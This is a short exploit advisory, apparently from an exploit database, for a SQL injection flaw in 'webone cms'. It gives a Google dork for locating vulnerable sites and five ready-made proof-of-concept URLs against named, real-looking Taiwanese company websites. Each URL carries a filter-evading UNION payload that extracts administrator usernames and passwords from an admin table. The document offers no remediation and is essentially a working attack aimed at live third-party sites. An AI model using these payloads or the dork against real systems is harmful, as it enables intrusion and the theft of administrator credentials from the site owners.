>>>> {in the name of god} <<<<

*-------------------------------------------|   
 exploit title:webone cms sql injection vulnerability
 date: Monday, May 15, 2017
 author: Ashiyane digital security team   
 vendor homepage : Http://webone.com.tw/
 cwe : Cwe-89
 risk level : High
 category: Web application
 tested on : Windows 10 / chrome 
*-------------------------------------------|  

*-------------|  
 google dork  : "inurl:/news_con.php?lang="
*-------------|   


*-------------------------------------------|
  Proof of Concept (POC) : 
 
  Http://www.glorytex.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
   
  Http://joylife-taiwan.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
  
  Http://www.winnienet.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
   
  Http://www.bosslin101.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
  
  Http://www.abilities.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
   
*------------------------------------------- 
     	 
	 *--------------------------*
	 | discovered by : Hackfans | 
	 *--------------------------*